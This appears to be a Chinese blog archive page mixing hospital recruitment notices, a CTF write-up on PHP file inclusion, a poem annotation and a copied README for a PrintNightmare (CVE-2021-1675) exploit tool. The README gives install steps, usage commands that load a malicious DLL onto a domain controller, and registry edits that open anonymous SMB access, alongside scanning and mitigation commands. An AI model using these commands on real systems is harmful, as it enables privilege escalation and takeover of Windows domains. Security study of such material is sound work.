作者归档:一个有身份的土豆

华宁县人民医院 华宁县中医医院 招聘编外麻醉医生公告

因工作需要,我院拟招聘编外麻醉医生2名,通过公开报名、考试考核、临床试用后择优录取。

一、 报名条件

1.遵守宪法和法律。

2.具有良好的品行,热爱医务工作。

3.身体健康,具备麻醉岗位身体素质和技能。

4.年龄要求。18周岁(含18岁)以上30周岁及以下(医师及以上职称可放宽到45岁及以下)。年龄计算时间至2021年9月30日。

二、学历和专业要求

1.学历:全日制专科及以上学历。

2.专业:临床医学 、麻醉学。

3.有执业(助理)医师资格证者优先。

三、报名事项

1.报名时间:2021年9月8日至2021年9月17日。 (工作时间:8:00—11:30; 14:30—18:00)

2.报名地点:华宁县人民医院门诊三楼人力资源部

3.报名提供的证件:毕业证、身份证和相关证书(学位证、执业资格证等)原件及复印件1份,小一寸证照一张。报名填写信息须为真实情况,若有虚假、遗漏、错误,责任自负,我院不予录用。

4.联系人:马老师 电话:15108779596 四、考核 采取面试考核方式择优录用。资格审查合格进入面试,面试成绩:总分100分。根据面试成绩从高分到低分排序录取(成绩须达60分及以上)。面试时间待通知(若报名人员不足3人时采取简易程序面试考核)。

五、体检 成绩合格人员进行体检,体检费自付。体检时间待通知。

六、公示 体检合格后进行公示,公示期为五个工作日,拟录用人员公示期满,没有收到影响聘用问题的,进入临床试用。

七、临床试用 临床试用期为1-6个月,试用期结束,经院科综合考核合格者录用签订合同。试用期间考核不合格者不予录用。

八、工资待遇

1.试用期工资:试用期实行定额工资,大专1450.00元;本科1550.00元。

2.试用期结束考核合格,签订《云南省劳动合同》(合同一年一签)后待遇:

(1)按学历、职称享受基本工资,次月10号前发放。大专、本科学历未取得职称资格证的1670.00元/月,取得执业助理医师证1730.00元/月,取得执业医师证2200.00/月。

(2)绩效工资(按出勤、工作量、岗位风险系数等计发),次月底发放。各科室绩效工资因岗位、工作量等不一样,绩效工资也不一样,平均3500.00元以上/月。

(3)享受职工医保、养老保险、工伤、生育、失业保险。

(4)享受工会福利待遇。

九、招聘监督 咨询电话:0877-5616814(华宁县人民医院人力资源部) 监督电话:0877-5616825(华宁县人民医院党办)

十、本公告未尽事宜,由华宁县人民医院、华宁县中医医院招聘工作人员领导小组负责解释。

华宁县人民医院 华宁县中医医院

2021年9月8日

华宁县人民医院 华宁县中医医院 招聘编外人员公告

因工作需要,我院拟招聘编外人员3名(其中:检验2名、收费员1名),通过公开报名、面试考核、科室试用后择优录取。

一、 报名条件

1.遵守宪法和法律。

2.具有良好的品行,热爱医院工作。

3.身体健康,具备检验或收费岗位身体素质和技能。

4.年龄在18周岁(含18岁)以上30周岁及以下,年龄计算时间至2021年8月31日。

二、学历和专业要求

1.学历:本科及其以上学历(若第一学历是专科的,专科学历须是普通高校毕业)

2.专业:收费员:专业不限;检验岗位:医学检验专业

三、报名事项

1.报名时间:2021年8月26日至2021年8月31日。 (报名工作时间:8:00—11:30; 14:30—18:00)

2.报名地点:华宁县人民医院门诊三楼人力资源部

3.报名提供的资料:毕业证、身份证和相关证书(学位证、资格证等)原件及复印件1份,五分彩色证照一张。

4.联系人:马老师 电话:15108779596 四、面试考核 采取面试考核方式择优录用。资格审查合格进入面试,面试成绩:总分100分。根据面试成绩从高分到低分排序录取(成绩须达60分及以上)。面试时间待通知(若报名人员不足3人时采取简易程序面试考核)。

五、体检 成绩合格人员进行体检,体检费自付。体检时间待通知。

六、公示 体检合格后进行公示,公示期为五个工作日,拟录用人员公示期满,没有收到影响聘用问题的,进入科室试用。

七、试用 试用期为1-6个月,试用结束(由科室决定试用时间),经院科综合考核合格者录用,考核不合格者不予录用。

八、工资待遇

1.试用期工资:试用期实行定额工资,本科1550.00元。

2.试用期结束考核合格,签订《云南省劳动合同》(合同一年一签)后待遇:基本工资十绩效工资十工会福利

(1)按学历、职称享受基本工资,次月初10号发放。本科学历未取得职称资格证的1670.00元/月,取得资格证1864.00元/月。

(2)绩效工资(按出勤、工作量、岗位风险系数等计发),次月底计发。各科室绩效工资因岗位、工作量等不一样,绩效工资也不一样,平均2500.00元以上/月。

(3)享受职工医保、养老保险、工伤、生育、失业保险。 (4)享受工会福利待遇。

九、招聘监督 咨询电话:0877-5616814(华宁县人民医院人力资源部) 监督电话:0877-5019059(华宁县人民医院党办)

十、本公告未尽事宜,由华宁县人民医院、华宁县中医医院招聘工作人员领导小组负责解释。

华宁县人民医院 华宁县中医医院

2021年8月26日

BMZCTF-端午就该吃粽子-WP

00×0

题目是这个样子滴。

点击链接后跳转到

刚开始以为是sql注入或者是xxs注入,谁知道查看网页源代码以后发现登陆按钮就是个摆设,根本没有提交的功能,整个页面纯静态。

00×1

在我看着纳闷的时候,浏览器地址栏告诉我一个问题,样子是这样的。

他居然可以这样调用php文件,应该是php的任意文件包含漏洞利用。琢磨着就试了一下这波操作。

居然可以查看/etc/passwd,心里暗自高兴,不会那么简单吧,直接查看flag???题目有提示,flag就在根目录。果断进行操作。

看到该页面激动的心情瞬间掉落,想想也对,不可能这样简单啊。寻思着应该做了关键字过滤了,居然存在任意文件包含,那我就试着把login.php的源码弄出来看看。紧接着进行了这波操作。

00×2

得到BASE64的源码,解码操作后得到以下东西。

一看,我呢个擦,该过滤的都过滤了,该封锁的都封锁了,那只有进行日志包含了,果断查看了一波日志文件,都没有显示,此刻陷入了僵局。百思不得姐。。难道这题目不是这样玩的???整整一个中午,还是百思不得姐。

00×3

没办法了,群内求助大佬。有了以下对话,在这里感谢群内海洋同学的提示。

我呢个擦,居然还有个index.php。打开页面一片空白,当时也没多想,谁知道一查看还真有东西,下面执行了这波操作。

解码后得到如下代码。

又是一堆的过滤,看完代码后直接执行以下语句得到FLAG。

00×4

总结一下,CTF有时候就是看你思维如何跳跃,不要局限在一方面。整整一个中午,就把经历放在了login.php。

华宁县人民医院招聘编外驾驶员公告

因工作需要,我院拟招聘编外驾驶员1名,通过公开报名、面试考核、上岗试用后择优录取。

一、 报名条件

1.遵守宪法和法律。

2.具有良好的品行,热爱卫生、驾驶事业。

3.身体健康,具备车辆驾驶员岗位身体素质和技能。

4.年龄在18周岁以上40周岁以下(含40岁),年龄时间计算至2021年7月31日。

二、学历、专业和要求

1.学历:初中及其以上学历。

2.资格证:有中华人民共和国机动车驾驶证,准驾车型: B1及以上(含B1)

3.要求:有五年及以上驾龄,无重大交通事故记录。

三、报名事项

1.报名时间:2021年7月12日至2021年7月16日。 (工作时间:8:00—11:30; 14:30—18:00)

2.报名地点:华宁县人民医院人力资源部(门诊部三楼)

3.报名提供的证件:毕业证、身份证和相关证书(驾驶证等)原件及复印件1份。

4.联系人:马媛 电话:0877-5616814 15108779596

四、面试考核 采取面试考核方式择优录用。资格审查合格进入面试,面试成绩:总分100分。根据面试成绩从高分到低分排序录取(成绩须达60分及以上)。面试时间待通知。

五、体检 成绩合格人员进行体检,体检费自付。体检时间待通知。

六、公示 体检合格后进行公示,公示期为五个工作日,拟录用人员公示期满,没有收到影响聘用问题的,上岗试用。

七、临床试用 上岗试用期为3-12个月,试用结束,经院科综合考核合格者录用,考核不合格者不予录用。

八、招聘监督 咨询电话:0877-5616814(华宁县人民医院人力资源部) 监督电话:0877-5019059(华宁县人民医院党办)

九、本公告未尽事宜,由华宁县人民医院、华宁县中医医院招聘工作人员领导小组负责解释。 附件:华宁县人民医院求职报名表

华宁县人民医院

2021年7月12日

附件下载

CVE-2021-1675 / CVE-2021-34527

Impacket implementation of the PrintNightmare PoC originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370)

Tested on a fully patched 2019 Domain Controller

Execute malicious DLL’s remote or locally

Installation

Before running the exploit you need to install my version of Impacket and after that you’re gucci

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

CVE-2021-1675.py

usage: CVE-2021-1675.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target share

CVE-2021-1675 implementation.

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
  share                 Path to DLL. Example '\\10.10.10.10\share\evil.dll'

optional arguments:
  -h, --help            show this help message and exit

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

connection:
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name
                        and you cannot resolve it
  -port [destination port]
                        Destination port to connect to SMB Server

Example;
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll'

SMB configuration

Easiest way to host payloads is to use samba and modify /etc/samba/smb.conf to allow anonymous access

[global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445
[smb]
    comment = Samba
    path = /tmp/
    guest ok = yes
    read only = no
    browsable = yes
    force user = smbuser

From windows it’s also possible

mkdir C:\share
icacls C:\share\ /T /grant Anonymous` logon:r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
# Reboot

Scanning

We can use rpcdump.py from impacket to scan for potential vulnerable hosts, if it returns a value, it could be vulnerable

rpcdump.py @192.168.1.10 | grep MS-RPRN

Protocol: [MS-RPRN]: Print System Remote Protocol

Mitigation

Disable Spooler service

Stop-Service Spooler
REG ADD  "HKLM\SYSTEM\CurrentControlSet\Services\Spooler"  /v "Start" /t REG_DWORD /d "4" /f

Or Uninstall Print-Services

Uninstall-WindowsFeature Print-Services

华宁县人民医院县外选调信息

华宁县人民医院县外选调信息

一、拟选调条件1.拥护中国共产党的领导,政治表现好;

2.遵纪守法,无违规违纪等不良记录、品行端正,热爱卫生事业;

3.身体健康(按公务员体检标准体检合格),取得执业资格;

4.选调人员须为卫生健康系统事业单位在编在职人员;

5.年龄在35周岁及以下,中级职称及以上可放宽到45岁及以下;

6.本科及以上学历,具有助理级及以上职称资格;

7.具有2年及以上的医院工作经历,专业能力强,近5年内履职考核合格及以上(试用期除外)。

二、县外选调名额:数名三、

调动方式:考察调动三、

华宁县外有意想调华宁县人民医院工作的人员请联系。

联系人:马老师    联系电话:15108779596

画鸡

注释译文词语注释
①裁:裁剪,这里是制作的意思。
②将:助词,用在动词和来、去等表示趋向的补语之间。
③平生:平素,平常。
④轻:随便,轻易。
⑤言语:这里指啼鸣,喻指说话,发表意见。
⑥一:一旦。
⑦千门万户:指众多的人家。
白话译文头上的红色冠子不用特别剪裁,雄鸡身披雪白的羽毛雄纠纠地走来。它平生不敢轻易鸣叫,它叫的时候,千家万户的门都打开。